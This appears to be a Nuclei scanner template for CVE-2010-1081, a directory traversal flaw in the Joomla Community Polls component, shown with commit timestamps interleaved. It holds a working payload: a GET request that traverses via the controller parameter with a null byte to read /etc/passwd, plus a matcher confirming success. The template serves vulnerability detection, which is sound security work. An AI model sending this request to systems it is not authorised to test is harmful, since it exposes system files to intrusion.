2022-02-13 19:12:38 +00:00
id : CVE-2010-1081
2022-04-22 10:38:41 +00:00
2021-09-27 11:02:48 +00:00
info :
name : Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author : daffainfo
severity : high
2022-02-13 18:44:39 +00:00
description : A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
2021-09-27 13:06:48 +00:00
reference :
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
2022-05-17 09:18:12 +00:00
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
remediation : Apply all relevant security patches and product upgrades.
2022-02-13 18:44:39 +00:00
classification :
2022-02-13 19:12:38 +00:00
cve-id : CVE-2010-1081
2022-04-22 10:38:41 +00:00
tags : cve,cve2010,joomla,lfi
2021-09-27 11:02:48 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type : status
status :
2022-02-13 18:44:39 +00:00
- 200
# Enhanced by mp on 2022/02/13